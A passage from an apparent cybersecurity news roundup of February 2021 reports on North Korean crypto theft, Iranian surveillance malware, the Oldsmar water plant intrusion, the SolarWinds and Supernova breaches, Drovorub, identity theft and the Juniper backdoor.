The panel said it is investigating a September 2020 hack against a cryptocurrency exchange that resulted in approximately $281 million worth of cryptocurrencies being stolen, and transactions on the blockchain indicating the $281 million hack is related to a $23 million second hack in October 2020.
“Preliminary analysis, based on the attack vectors and subsequent efforts to launder the illicit proceeds strongly suggests links to the DPRK,” the experts said, using the initials of the country’s official name, the Democratic People’s Republic of Korea.
According to one unnamed country, North Korea also continues to generate illegal revenue by exploiting freelance information technology platforms using the same methods it does to access the global financial system -- false identification, use of virtual private network services, and establishing front companies in Hong Kong, the panel said.
The experts said they investigated attempted violations of the U.N. arms embargo, including illegal actions of blacklisted companies. They cited the Korea Mining Development Trading Corporation, alleged military cooperation by North Korea, and the use of the country’s overseas diplomatic missions for commercial purposes.
The panel said it also investigated “the country’s continued illicit import of refined petroleum, via direct deliveries and ship-to-ship transfers, using elaborate subterfuge.“
It cited images, data and calculations from an unidentified country showing that between Jan. 1 and Sept. 30 last year North Korea received shipments of refined petroleum products exceeding “by several times” the annual ceiling of 500,000 barrels set by the Security Council.
U.N. sanctions ban North Korean coal exports, and the panel said shipments of coal appear to have been largely suspended since late July 2020.
It said that last year, North Korea continued to transfer fishing rights in violation of sanctions, which earned the country $120 million in 2018, according to an unnamed member state.
Under a 2017 sanctions resolution, all North Korean nationals working overseas were to be repatriated by Dec. 22, 2019. The experts said they investigated North Korean workers earning income in sub-Saharan Africa as well as information technology workers dispatched by the Munitions Industry Department.
Microsoft to notify Office 365 users of nation-state attacks
9.2.2021 BigBrothers Securityaffairs
Microsoft implements alerts for ‘nation-state activity’ in the Defender for Office 365 dashboard, to allow organizations to quickly respond.
Since 2016, Microsoft has been alerting users of nation-state activity, now the IT giant added the same service to the Defender for Office 365 dashboard.
The new security alert will notify companies when their employees are being targeted by state-sponsored attacks.
Since this Saturday, the new alert service was added to the Microsoft 365 roadmap website.
“Nation state threats are defined as cyber threat activity that originates in a particular country with the apparent intent of furthering national interests. These attacks represent some of the most advanced and persistent threat activity Microsoft tracks.” reads the announcement published by Microsoft. “The Microsoft Threat Intelligence Center follows these threats, builds comprehensive profiles of the activity, and works closely with all Microsoft security teams to implement detections and mitigations to protect our customers. We’re adding an alert to the security portal to alert customers when suspected nation-state activity is detected in the tenant.”
Since 2016 Microsoft continues to track nation-state activity against the email accounts of its customers, the IT giant warned of state-sponsored hacking campaigns originating from China, Russia, and Iran for years.
Every time Microsoft experts have detected attacks from state-sponsored hackers, they have alerted users via email.
Unfortunately, not all users read the email alerts, or for some reason, they could read the alerts with delay giving the attackers the time to conduct malicious activities.
To make the alerting service more efficient, Microsoft implemented it inside the dashboard of Microsoft Defender for Office 365 (previously known as Office 365 Advanced Threat Protection or Office 365 ATP) .
Microsoft Defender for Office 365 protects all of Office 365 against advanced threats like business email compromise and credential phishing. It automatically investigates and remediates attacks.
The alerts are also sent to system administrators and security teams, who can directly contact the affected employees and take action to prevent their accounts take over.
Microsoft plans to deploy the new notification feature by the end of February.
Microsoft is offering organizations that don’t yet have a license with support for Microsoft Defender for Office 365 a free 30-day evaluation.
Over 1,200 Iranians Targeted in Domestic Surveillance Campaign
9.2.2021 BigBrothers Securityweek
More than 1,200 Iranian citizens have been targeted in extensive cyber-surveillance operations backed by the Iranian government, researchers with cybersecurity firm Check Point report.
The attacks, which Check Point refers to collectively as Domestic Kitten, have been ongoing for roughly four years, orchestrated by a threat actor tracked as APT-C-50, which executes the campaigns on behalf of the Iranian government.
The targets of these attacks, the researchers say, are the Kurdish minority in Iran, opposition forces, internal dissidents, ISIS advocates, and other individuals that the Iranian regime believes could represent a threat.
A total of 10 unique campaigns were observed to date, including 4 that are currently active. The most recent of these campaigns started in November 2020. Two of the remaining three active campaigns have been ongoing since mid-2017, and the last one since mid-2018.
The attacks employed a broad range of vectors to trick victims into installing a malicious Android application: Telegram channels, text messages containing a link to the software, and an Iranian blog. More than 600 of the targeted individuals had their devices infected.
Dubbed FurBall and based on commercially available spyware called KidLogger, the malware leveraged in these attacks is capable of collecting information such as device identifiers, SMS messages, call logs, contact lists, user accounts, browsing history, and a list of installed applications.
Furthermore, it can access a device’s microphone and camera to record sound and video, can record calls, steal files (including from external storage), track the device’s location, and delete messages and files.
Once on the victim’s device, the malware masquerades itself as a fake mobile security application, a news app, a repackaged version of a game, an Android application store, a wallpaper application, or an application for a restaurant in Tehran.
The recent campaigns, Check Point says, leverage the same infrastructure that was used in attacks detailed in 2018.
In addition to victims in Iran, the operations targeted individuals worldwide, including the United States, the United Kingdom, Afghanistan, Pakistan, Turkey, and more.
Hacker Tried Poisoning Water Supply After Breaking Into Florida's Treatment System
9.2.2021 BigBrothers Thehackernews
Hackers successfully infiltrated the computer system controlling a water treatment facility in the U.S. state of Florida and remotely changed a setting that drastically altered the levels of sodium hydroxide (NaOH) in the water.
During a press conference held yesterday, Pinellas County Sheriff Bob Gualtieri said an operator managed to catch the manipulation in real-time and restored the concentration levels to undo the damage.
"At no time was there a significant effect on the water being treated, and more importantly the public was never in danger," Sheriff Gualtieri said in a statement.
password auditor
The water treatment facility, which is located in the city of Oldsmar and serves about 15,000 residents, is said to have been breached for approximately 3 to 5 minutes by unknown suspects on February 5, with the remote access occurring twice at 8:00 a.m. and 1:30 p.m.
The attacker briefly increased the amount of sodium hydroxide from 100 parts-per-million to 11,100 parts-per-million using a system that allows for remote access via TeamViewer, a tool that lets users monitor and troubleshoot any system problems from other locations.
"At 1:30 p.m., a plant operator witnessed a second remote access user opening various functions in the system that control the amount of sodium hydroxide in the water," the officials said.
Sodium hydroxide, also known as lye, is a corrosive compound used in small amounts to control the acidity of water. In high and undiluted concentrations, it can be toxic and can cause irritation to the skin and eyes.
It is not immediately known if the hack was done from within the U.S. or outside the country. Detectives with the Digital Forensics Unit said an investigation into the incident is ongoing.
Although an early intervention averted more serious consequences, the sabotage attempt highlights the exposure of critical infrastructure facilities and industrial control systems to cyberattacks.
The fact that the attacker leveraged TeamViewer to take over the system underscores the need for securing access with multi-factor authentication and preventing such systems from being externally accessible.
"Manually identify software installed on hosts, particularly those critical to the industrial environment such as operator workstations — such as TeamViewer or VNC," said Dragos researcher Ben Miller. "Accessing this on a host-by-host basis may not be practical but it is comprehensive."
"Remote access requirements should be determined, including what IP addresses, what communication types, and what processes can be monitored. All others should be disabled by default. Remote access including process control should be limited as much as possible."
Detailed: Here's How Iran Spies on Dissidents with the Help of Hackers
9.2.2021 BigBrothers Thehackernews
Twin cyber operations conducted by state-sponsored Iranian threat actors demonstrate their continued focus on compiling detailed dossiers on Iranian citizens that could threaten the stability of the Islamic Republic, including dissidents, opposition forces, and ISIS supporters, and Kurdish natives.
Tracing the extensive espionage operations to two advanced Iranian cyber-groups Domestic Kitten (or APT-C-50) and Infy, cybersecurity firm Check Point revealed new and recent evidence of their ongoing activities that involve the use of a revamped malware toolset as well as tricking unwitting users into downloading malicious software under the guise of popular apps.
"Both groups have conducted long-running cyberattacks and intrusive surveillance campaigns which target both individuals' mobile devices and personal computers," Check Point researchers said in a new analysis. "The operators of these campaigns are clearly active, responsive and constantly seeking new attack vectors and techniques to ensure the longevity of their operations."
Despite overlaps in the victims and the kind of information amassed, the two threat actors are considered to be independently operating from one another. But the "synergistic effect" created by using two different sets of attack vectors to strike the same targets cannot be overlooked, the researchers said.
Domestic Kitten Mimics a Tehran Restaurant App
Domestic Kitten, which has been active since 2016, has been known to target specific groups of individuals with malicious Android apps that collect sensitive information such as SMS messages, call logs, photos, videos, and location data on the device along with their voice recordings.
Spotting four active campaigns, the most recent of which began in November 2020 according to Check Point, the APT-C-50 actor has been found to leverage a wide variety of cover apps, counting VIPRE Mobile Security (a fake mobile security application), Exotic Flowers (a repackaged variant of a game available on Google Play), and Iranian Woman Ninja (a wallpaper app), to distribute a piece of malware called FurBall.
The latest November operation is no different, which takes advantage of a fake app for Mohsen Restaurant located in Tehran to achieve the same objective by luring victims into installing the app by multiple vectors — SMS messages with a link to download the malware, an Iranian blog that hosts the payload, and even shared via Telegram channels.
Prominent targets of the attack included 1,200 individuals located in Iran, the US, Great Britain, Pakistan, Afghanistan, Turkey, and Uzbekistan, the researchers said, with over 600 successful infections reported.
Once installed, FurBall grants itself wide permissions to execute the app every time automatically on device startup and proceeds to collect browser history, hardware information, files on the external SD card, and periodically exfiltrate videos, photos, and call records every 20 seconds.
It also monitors clipboard content, gains access to all notifications received by the device, and comes with capabilities to remotely execute commands issued from a command-and-control (C2) server to record audio, video, and phone calls.
Interestingly, FurBall appears to be based on a commercially available Spyware called KidLogger, implying the actors "either obtained the KidLogger source-code, or reverse-engineered a sample and stripped all extraneous parts, then added more capabilities."
Infy Returns With New, Previously Unknown, Second-Stage Malware
First discovered in May 2016 by Palo Alto Networks, Infy's (also called Prince of Persia) renewed activity in April 2020 marks a continuation of the group's cyber operations that have targeted Iranian dissidents and diplomatic agencies across Europe for over a decade.
While their surveillance efforts took a beating in June 2016 following a takedown operation by Palo Alto Networks to sinkhole the group's C2 infrastructure, Infy resurfaced in August 2017 with anti-takeover techniques alongside a new Windows info-stealer called Foudre.
The group is also suggested to have ties to the Telecommunication Company of Iran after researchers Claudio Guarnieri and Collin Anderson disclosed evidence in July 2016 that a subset of the C2 domains redirecting to the sinkhole was blocked by DNS tampering and HTTP filtering, thus preventing access to the sinkhole.
Then in 2018, Intezer Labs found a new version of the Foudre malware, called version 8, that also contained an "unknown binary" — now named Tonnerre by Check Point that's used to expand on the capabilities of the former.
"It seems that following a long downtime, the Iranian cyber attackers were able to regroup, fix previous issues and dramatically reinforce their OPSEC activities as well as the technical proficiency and abilities of their tools," the researchers said.
As many as three versions of Foudre (20-22) have been uncovered since April 2020, with the new variants downloading Tonnerre 11 as the next-stage payload.
The attack chain commences by sending phishing emails containing lure documents written in Persian, that when closed, runs a malicious macro that drops and executes the Foudre backdoor, which then connects to the C2 server to download the Tonnerre implant.
Besides executing commands from the C2 server, recording sounds, and capturing screenshots, what makes Tonnerre stand out is its use of two sets of C2 servers — one to receive commands and download updates using HTTP and a second server to which the stolen data is exfiltrated via FTP.
At 56MB, Tonnerre's unusual size is also likely to work in its favor and evade detection as many vendors ignore large files during malware scans, the researchers noted.
However, unlike Domestic Kitten, only a few dozen victims were found to be targeted in this attack, including those from Iraq, Azerbaijan, the U.K., Russia, Romania, Germany, Canada, Turkey, the U.S., Netherlands, and Sweden.
"The operators of these Iranian cyber espionage campaigns seem to be completely unaffected by any counter-activities done by others, even though they were revealed and even stopped in the past — they simply don't stop," said Yaniv Balmas, head of cyber research at Check Point.
"These campaign operators simply learn from the past, modify their tactics, and go on to wait for a while for the storm to pass to only go at it again. Furthermore, it's worthy to note the sheer amount of resources the Iranian regime is willing to spend on exerting their control."
Microsoft Says Its Services Not Used as Entry Point by SolarWinds Hackers
6.2.2021 BigBrothers Securityweek
In response to speculation that its services may have been leveraged as an initial entry point by the hackers who breached IT management firm SolarWinds, Microsoft said on Thursday there was no evidence to back those claims.
Reports, including from several mainstream media publications, have speculated about the role of Microsoft services in the SolarWinds attack and other operations conducted by the same threat group. The Wall Street Journal reported on February 2 that even SolarWinds’ new CEO, Sudhakar Ramakrishna, said one of the several theories was that the attackers may have compromised his company’s Office 365 accounts and then used that as an initial point of entry.
However, in a blog post published on the SolarWinds website on February 3, Ramakrishna said that while the attackers did leverage Microsoft services as part of the attack, the investigation so far leads them to believe that “the most likely attack vectors came through a compromise of credentials and/or access through a third-party application via an at the time zero-day vulnerability.”
He clarified, “While we’ve confirmed suspicious activity related to our Office 365 environment, our investigation has not identified a specific vulnerability in Office 365 that would have allowed the threat actor to enter our environment through Office 365.
“We’ve confirmed that a SolarWinds email account was compromised and used to programmatically access accounts of targeted SolarWinds personnel in business and technical roles. By compromising credentials of SolarWinds employees, the threat actors were able to gain access to and exploit our Orion development environment,” Ramakrishna added.
In a blog post on Thursday, Microsoft, which dubbed the attack “Solorigate,” also said there was no indication that SolarWinds was attacked via Office 365.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) revealed recently that many of the organizations targeted by the SolarWinds hackers were breached through attack vectors that did not involve the SolarWinds supply chain attack, leaving many to speculate that Microsoft services may have been abused.
Microsoft said on Thursday that while data hosted in Microsoft email and other services was targeted by the hackers “post compromise,” it had found no evidence that its services were used as an initial entry point into the systems of organizations, claiming that the attackers apparently gained privileged credentials “in some other way.”
“From the beginning, we have said that we believe this is a sophisticated actor that has many tools in its toolkit, so it is not a surprise that a sophisticated actor would also use other methods to gain access to targets. In our investigations and through collaboration with our industry peers, we have confirmed several additional compromise techniques leveraged by the actor, including password spraying, spearphishing, use of webshell, through a web server, and delegated credentials,” Microsoft said.
After the SolarWinds supply chain attack came to light, Microsoft said it had notified some customers about suspicious activity related to their Azure and Microsoft 365 accounts. The list of organizations alerted by Microsoft includes cybersecurity firms CrowdStrike, which said the attackers attempted to read emails but failed, and Malwarebytes, which admitted that the hackers did gain access to “a limited subset of internal company emails.”
Second SolarWinds Attack Group Breaks into USDA Payroll — Report
4.2.2021 BigBrothers Threatpost
A second APT, potentially linked to the Chinese government, could be behind the Supernova malware.
There had been hints that a second group of malicious actors may have exploited a SolarWinds bug to install the Supernova backdoor — notably, there was a conclusion by Microsoft back in December that this was the case. Now, sources told Reuters that there’s evidence that a separate advanced persistent threat (APT), likely China-backed, is behind the malware.
Reuters reported that the group targeted a Department of Agriculture payroll system, called the National Finance Center (NFA). According to Reuters, the APT’s infrastructure used in the USDA attack matches that known to be deployed by government-backed Chinese actors.
The group used a “separate vulnerability” from the Sunburst backdoor that was at the heart of the sprawling espionage campaign that came to light in December, according to Reuters. That original effort (a Russian APT is believed to be responsible) used trojanized software updates for the SolarWinds Orion network-management platform to disseminate the Sunburst malware to SolarWinds customers in a supply-chain attack. The threat actors then used that initial compromise to perform follow-on espionage attacks on selected targets.
SolarWinds confirmed that the new APT offensive was not a supply-chain attack; instead, the cyberattackers exploited a software vulnerability in Orion after it was installed in targets’ networks, in order to install the backdoor called Supernova. It was originally discovered in December, and Microsoft noted at the time that because the malware didn’t match the fingerprints of the Sunburst attack, Supernova may have originated from another APT group.
“The customer’s network was compromised in a way that was unrelated to SolarWinds,” a SolarWinds-provided statement said. “That breach enabled the attackers to add the malicious Supernova code to Orion software on the customer’s network. We are aware of one instance of this happening and there is no reason to believe these attackers were inside the SolarWinds environment at any time. This is separate from the broad and sophisticated attack that targeted multiple software companies as vectors.”
Supernova is malware designed to appear to be part of a SolarWinds product. According to a SolarWinds advisory, it consists of two components.
“The first was a malicious, unsigned webshell DLL, ‘app_web_logoimagehandler.ashx.b6031896.dll,’ specifically written to be used on the SolarWinds Orion platform. The second is the utilization of a vulnerability in the Orion platform to enable deployment of the malicious code. This vulnerability in the Orion platform has been resolved in the latest updates.”
It should be noted that there is some question about the exact nature of the USDA cyberattack. First, a USDA spokesman told Reuters, “USDA has notified all customers (including individuals and organizations) whose data has been affected by the SolarWinds Orion code compromise.”
But, after Reuters published its story, it was updated with a follow-up statement from USDA correcting its earlier response, adding “there was no data breach related to SolarWinds.”
Threatpost has reached out for clarification.
Nation-State ‘Surfing’
The two SolarWinds-based attacks weren’t coordinated, but rather done in parallel with one another, which former U.S. Chief Information Security Officer Gregory Touhill told Reuters was common. He said this isn’t the “first time we’ve seen a nation-state actor surfing behind someone else,” which suggests that the Supernova attack group may have been aware of what the Russian APT was doing.
USDA’s hack brings the tally of compromised federal agencies related SolarWinds to at least seven. Six previously breached by the Russians include the Departments of Energy, Homeland Security, Treasury, Commerce, Defense and the National Institute of Health.
Reuters added that its reporting could not establish the full scope of the Supernova attack.
Sunburst APT Infiltrated SolarWinds in 2019
Starting in Feb. 2020, a Russian APT used Sunburst-laden product updates that were pushed out to more than 18,000 SolarWinds customers all over the world. There they lurked for nine months waiting for the right time to strike with follow-on attacks.
The Wall Street Journal reported this week that there is new evidence the Russian attackers were present in SolarWind’s Office 365 email system well before that — since December 2019.
“Some email accounts were compromised,” SolarWinds’ new CEO Sudhakar Ramakrishna told the outlet. “That led them to compromise other email accounts and as a result our broader (Office) 365 environment was compromised.”
The nation-state backed adversaries didn’t just target government agencies; they also compromised security vendors, including CrowdStrike, Fidelis, FireEye, Malwarebytes, Palo Alto Networks and Qualys.
Aftermath: Biden Earmarks $10B for Cybersecurity
The new Biden administration has pledged additional resources to shore up the U.S. government’s cybersecurity efforts, earmarking a $10 billion down payment to expand Cybersecurity and Infrastructure Security Agency (CISA). The SolarWinds cleanup will be a first priority. Tom Kellerman, researcher with VMWare Carbon Black, calls it a good “down payment.”
“That number should probably be about $100 billion over time,” said Kellermann. “And I hope that there’s a classified cybersecurity spend that exceeds that, in a classified… military appropriation budget.”
While government agencies continue to find out just how deep, wide and devastating the SolarWinds breach really was, this incident should serve as a warning to every system administrator across the world about proper security hygiene, researchers said.
“It’s not surprising to see China — or any adversary with strong forensic and coding capabilities — working to discover and exploit flaws in any software that touches sensitive information such as payroll,” Rosa Smothers, a former CIA threat analyst and current vice president at KnowBe4 said via email. “SolarWinds released a patch in December to repair this vulnerability, which reinforces what we’ve said all along: Patch your systems early and often.”
Alleged China-linked hackers used SolarWinds bug to breach National Finance Center
4.2.2021 BigBrothers Securityaffairs
Alleged China-linked hackers have exploited a flaw in the SolarWinds Orion software to hack systems at the U.S. National Finance Center.
FBI investigators discovered that allegedly China-linked hackers have exploited a flaw in the SolarWinds Orion software to break into the systems of the U.S. National Finance Center.
The National Finance Center is a federal payroll agency in the U.S. Department of Agriculture, that provides human resources and payroll services to hundreds of federal agencies.
The incident has not been linked to the recently disclosed SolarWinds supply chain attack, in the attack against the NFC the threat actors exploited a different vulnerability.
“Two people briefed on the case said FBI investigators recently found that the National Finance Center, a federal payroll agency inside the U.S. Department of Agriculture, was among the affected organizations, raising fears that data on thousands of government employees may have been compromised.” reported the Reuters agency.
“The software flaw exploited by the suspected Chinese group is separate from the one the United States has accused Russian government operatives of using to compromise up to 18,000 SolarWinds customers, including sensitive federal agencies, by hijacking the company’s Orion network monitoring software.”
SolarWinds announced it was aware of a successful attack carried out by the second hacker group, but did not attribute it to a specific threat actor. The software provider pointed out that hackers did not compromise its internal network and confirmed that it had already addressed the flaw exploited in the attack.
“In the case of the sole client it knew about, SolarWinds said the hackers only abused its software once inside the client’s network. SolarWinds did not say how the hackers first got in, except to say it was “in a way that was unrelated to SolarWinds.” continues the Reuters.
The U.S. Department of Agriculture confirmed the security breach and “has notified all customers (including individuals and organizations) whose data has been affected by the SolarWinds Orion Code Compromise.”
Later, a different USDA spokesman, denied that the NFC was hacked and added that “there was no data breach related to Solar Winds” at the agency.
According to Reuters’ sources who spoke on condition of anonymity, the threat actors’ tools and C2 infrastructure were employed in past attacks conducted by China-linked threat actors.
The Chinese foreign ministry denied the involvement of Chine in this attack and invited the US authorities to support these allegations with evidence.
“China resolutely opposes and combats any form of cyberattacks and cyber theft,” it said in a statement.
At the time of this writing, Reuters was not able to determine the type and the volume of information the attackers have stolen from the National Finance Center (NFC). Experts highlighted that the potential impact of this security breach could be severe due to the type of data managed by the US agency.
China-Linked Hackers Exploited SolarWinds Flaw in U.S. Government Attack: Report
4.2.2021 BigBrothers Securityweek
Hackers believed to be from China have exploited a vulnerability in a SolarWinds product as part of a campaign targeting at least one U.S. government agency, Reuters reported on Tuesday.
In late December, a few weeks after it came to light that Texas-based IT management solutions provider SolarWinds was targeted in a sophisticated supply chain attack, researchers from several organizations revealed that one of the pieces of malware they had analyzed, dubbed Supernova, had apparently been used by a second group that was not related to the supply chain attack.
The supply chain attack, which has been linked to Russian threat actors, involved a breach of SolarWinds systems and the delivery of malware through updates for the company’s Orion monitoring product. These updates were delivered to thousands of SolarWinds customers, and a few hundred organizations that were of interest to the attackers also received other payloads that may have given the hackers deep access to their systems.
In the case of Supernova, however, the attackers apparently did not gain access to SolarWinds systems. Instead, they exploited a zero-day vulnerability in the Orion platform and delivered the Supernova malware only after they gained access to the targeted networks. SolarWinds patched the vulnerability involved in the Supernova attack in December. The flaw, tracked as CVE-2020-10148, has been described as an authentication bypass issue that allows remote command execution.
Reuters learned from people with knowledge of the investigation into Supernova that the infrastructure and tools used in the attack provided a link to cyberspies believed to be backed by the Chinese government.
SolarWinds told Reuters that it’s only aware of a single customer being targeted with the Supernova malware, but it did not name the customer and said it could not conclusively determine who was behind the attack.
Reuters reported that one victim of the Supernova attack was the National Finance Center (NFC), an agency inside the U.S. Department of Agriculture that reportedly handles payroll for several government organizations, including the State Department, FBI, Treasury Department, and the DHS.
The USDA initially confirmed being affected by the “SolarWinds Orion code compromise” and said all impacted customers had been notified — this could refer to the Russia-linked attack — but then said the NFC was not hacked, without providing clarifications.
The Chinese government has denied being responsible for the attack.
While SolarWinds enabled hackers to gain access to the systems of many organizations through the supply chain attack, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) reported recently that many of the entities targeted by this threat actor actually had no direct link to SolarWinds — roughly 30% of identified victims did not use the company’s products.
The Drovorub Mystery: Malware NSA Warned About Can't Be Found
4.2.2021 BigBrothers Securityweek
NSA and FBI Released Detailed Information on Drovorub Linux Malware, But Major Cybersecurity Firms Found No Samples
A piece of malware linked by U.S. intelligence agencies to hackers believed to be backed by the Russian government remains a mystery to the private sector, which apparently hasn’t found a single sample of the malware, and one researcher went as far as suggesting that it may be a false flag set up by the United States itself.
In August 2020, the NSA and the FBI released a joint cybersecurity advisory detailing a piece of malware they named Drovorub. According to the agencies, Drovorub was designed to target Linux systems as part of cyber espionage operations conducted by Russia’s General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS) military unit 26165, which has been linked to attacks conducted by the threat actor tracked as APT 28, Fancy Bear, Sednit and Strontium.
The 45-page report released by the NSA and FBI describes Drovorub as a “Linux malware toolset” that consists of an implant with a kernel module rootkit, a file transfer and port forwarding tool, and a command and control (C&C) server.
“When deployed on a victim machine, the Drovorub implant (client) provides the capability for direct communications with actor-controlled C2 infrastructure; file download and upload capabilities; execution of arbitrary commands as ‘root’; and port forwarding of network traffic to other hosts on the network,” the agencies wrote in their advisory.
The advisory shares information on how Drovorub works, how it can be detected, and how organizations can protect their systems against attacks involving the malware.
In November, French industrial giant Schneider Electric issued an advisory to warn customers about the potential threat posed by Drovorub to some of its products, but the company told SecurityWeek at the time that it hadn’t been aware of any actual incident involving the malware — its alert was issued based on the information from the NSA advisory.
In fact, no one in the private sector appears to have seen Drovorub attacks, or samples of the malware. SecurityWeek has reached out to several major cybersecurity solutions providers and no one seems to have obtained actual samples — or at least they’re currently not willing to share any information — despite the fact that the NSA’s advisory contains Snort rules, Yara rules and other technical information that would make it easy to find the malware on infected systems.
Contacted companies include Bitdefender, Symantec, ESET, Trend Micro, CrowdStrike, Google’s Chronicle, Kaspersky, FireEye, Microsoft, and ReversingLabs.
“It’s a highly advanced sample, used in very targeted ways by a very sophisticated threat actor against a small number of selected targets. So by the very nature of it, you will only get such a sample if one of those victims discloses it, and if those victims are themselves highly sensitive – it is unlikely they would disclose that,” Robert McArdle, director of Trend Micro's Forward Looking Threat Research, said via email.
ESET said it had not seen Drovorub or any similar malware in the wild.
“Unlike mass-spreading malware, it looks like this malware is used in targeted intrusions against a small set of victims,” ESET researcher Anton Cherepanov told SecurityWeek. “In addition to that, usually Linux servers don't have any security software in place. That's why it's really hard to find samples of this malware in the wild.”
SecurityWeek has also reached out to the NSA and the FBI to see if the agencies had shared samples with the private sector or if they had plans to do so. The NSA did not respond and the FBI said it does not have any additional information to share beyond what was published in the advisory.
Drovorub is also mentioned in a recently published 400-page book, titled “Loaded for Guccifer2.0: Following A Trail of Digital Geopolitics,” written by David Jonathon Blake. In his book, Blake goes as far as suggesting that Drovorub is a false flag deployed by the United States to make it appear as if Russia was preparing an attack on critical infrastructure.
The author says he’s not a security expert, but claims that for the past several years — full time, for a large part of it — he has been researching what he believes to be false flag operations set up and conducted by the U.S. in an effort to blame Russia for various cyberattacks. The book, which suggests that even the 2016 attack on the Democratic National Committee was actually conducted by U.S. agencies, is a combination of technical research and speculation, and sounds very much like conspiracy theory.
In their report, the NSA and FBI shared little information on how they linked Drovorub to Russian intelligence. As an example related to attribution, they provide an IP address, 185.86.149.125, used by the malware for C&C, which was at some point allegedly accessed by an IP previously linked by Microsoft to Strontium.
Blake said 185.86.149.125 was associated with a physical server located in Latvia, but the IP address was also connected to a domain apparently registered by someone in a Russian city where the GRU is known to have a presence. However, the author claims that the same domain — for a very short while in 2018 — resolved to an IP address that always belonged to a major US tech company that provides services to the U.S. government.
Identity Theft Spikes Due to COVID-19 Relief
3.2.2021 BigBrothers Threatpost
Cases reported to the FTC doubled last year as cybercriminals took advantage of increased filing for government relief benefits due to the pandemic.
Cases of identity theft in the United States doubled in 2020, mainly due to cybercriminals taking advantage of people affected economically by COVID-19 who filed to receive government benefits.
This is according to the Federal Trade Commission (FTC), which received about 1.4 million reports of identity theft last year, according to a blog post published Monday, when the commission kicked off its annual “Identity Theft Awareness Week.”
“Repeatedly, identity thieves targeted government funds earmarked to help people hard hit financially by the pandemic,” according to the post by Seena Gressin, an attorney with the Division of Consumer and Business Education at the FTC.
In 2020, there were 394,280 reports about government benefits fraud compared with 12,900 reports in 2019. Most of these involved people filing for unemployment benefits, which experienced a sharp rise in 2020 due to the pandemic, Gressin noted.
In 2020, the U.S. government expanded unemployment benefits to people left jobless by the pandemic, something cybercriminals took as an opportunity to file unemployment claims using other people’s personal information, she wrote.
In one such high-profile case, Rapper Fontrell Antonio Baines. who goes by the stage name “Nuke Bizzle,” boasted about perpetrating exactly this crime in his music video “EDD”—a reference to the California Employment Development Department.
The video shows Nuke Bizzle and his cohorts collecting EDD envelopes from various mailboxes, filing fraudulent claims on a laptop and spending wads of cash. Bizzle was subsequently arrested and ordered to stand trial in a U.S. District Court in Los Angeles.
Seasoned cybercriminals also aimed to cash in on COVID-19-related unemployment claims, with more success than the ill-fated rapper. The highly organized Nigerian cybergang Scattered Canary for instance walked off with millions in business e-mail compromise (BEC)-related fraudulent claims made on the online unemployment websites of eight U.S. states, according to a report released in May.
Small Business COVID-19 Fraud
People aiming to receive funds from government-sponsored small-business loan programs also experienced a rise in identity-theft crimes, according to the FTC. People reported 99,650 cases of fraud involving business or personal loans, compared with 43,920 reports in 2019.
Indeed, small businesses were some of the organizations most dramatically affected by COVID-19 economic shutdowns in 2020, and many business owners filed for federal relief. While “not all of the new reports related to the government-relief effort,” Gressin acknowledged, “they were a big share of the increase.”
Taxpayer Data and Stimulus Checks
Cybercriminals also used identity theft to target stimulus checks that the U.S. government paid out to the taxpayers, boosting the number of tax-related cases of this type of cybercrime, according to the FTC. In 2020, the FTC got 89,390 reports of tax-identity theft, compared with 27,450 reports in 2019.
Tax-based identity theft has traditionally been a popular tactic by cybercriminals to pilfer people’s yearly tax-return payments; however, in 2020 the numbers of online tax fraud “began to swell when distribution of the stimulus payments began” according to Gressin.
Indeed, hacker forums saw an increase in buying and selling taxpayer data around the time the COVID-19 relief package was announced, alongside the usual phishing and other campaigns typically used to steal annual tax payouts, according to a report released in May.
The FTC and its partners are co-hosting a series of free events this week around identity theft to help inform consumers. More info is available on the FTC’s website.
SolarWinds Hack Prompts Congress to Put NSA in Encryption Hot Seat
2.2.2021 BigBrothers Threatpost
Congress is demanding the National Security Agency come clean on what it knows about the 2015 supply-chain attack against Juniper Networks.
Members of Congress are demanding the U.S. National Security Agency (NSA) reveal what it knows about the 2015 Juniper Networks supply-chain delivery breach. In a letter sent by U.S. Senator Ron Wyden and nine additional members of Congress, the lawmakers demand a full account of the NSA-designed encryption algorithm compromised in 2015.
Sparking the inquest is the massive SolarWinds supply-chain attack. In their letter sent last week to the NSA, lawmakers suggest the spy agency is lacking effective oversight of software supply-chains relied upon by the U.S. government and private industry.
“In 2015, Juniper revealed a security breach in which hackers modified the software the company delivered to its customers,” a Wyden statement read. “Researchers subsequently discovered that Juniper had been using an NSA-designed encryption algorithm, which experts had long argued contained a backdoor, and that the hackers modified the key to this backdoor.”
A chief bone of contention among lawmakers is the allegation that the NSA’s “Dual_EC_DRBG” algorithm – submitted to National Institute of Standards and Technology (NIST) – contained an encryption backdoor for the spy agency. The move, lawmakers suggest, concerns Congress because it appears to be a tacit endorsement of weak encryption.
“The American people have a right to know why NSA did not act after the Juniper hack to protect the government from the serious threat posed by supply chain hacks. A similar supply chain hack was used in the recent SolarWinds breach, in which several government agencies were compromised with malware snuck into the company’s software updates,” the members wrote.
Why Juniper Illustrates Dangers of Intentionally Weak Crypto
In 2016, Juniper removed the backdoored Dual_EC DRBG algorithm, impacting its ScreenOS operating system. NIST also withdrew the algorithm, citing security concern.
Juniper’s use of Dual_EC dates to 2008, at least a year after Dan Shumow and Neils Ferguson’s landmark presentation at the CRYPTO conference, which first cast suspicion on Dual_EC being backdoored by the NSA.
To many, Juniper’s move to remove Dual_EC (and also ANSI X9.31 PRNG) confirmed the widely held belief the vulnerabilities were tied to operations by the NSA described in the 2013 article published by the German publication Der Spiegel. That article described the existence of a catalog of hardware and software tools used by the NSA to infiltrate equipment manufactured by Juniper, Cisco and Huawei. The story was based on leaked 2013 document by former contractor Edward Snowden.
Calls for encryption backdoors date back to the 1990s and the so-called Crypto Wars. That’s when President Bill Clinton’s administration insisted that U.S. government have a way to break the encryption that was exported outside of the United States.
Juniper Lessons Not Learned, Repeated with SolarWinds Hack?
In the Jan. 28 letter to NSA chief Gen. Paul Nakasone, the group of Democratic lawmakers want the agency to provide a previously undisclosed report about “lessons learned” from the Juniper hack and detail what actions NSA took afterwards. The lawmakers gave NSA until Feb. 26 to respond.
In June, Wyden also co-signed a letter to Juniper CEO Rami Rahim seeking answers about the hack. Experts have long expressed concern that the weaknesses in the NSA algorithm could have been exploited by any number of hackers. Parallels between the SolarWinds and Juniper hacks are similar in that both involved federally managed computer systems and compromised software supply chains.
Wind River Security Incident Affects SSNs, Passport Numbers
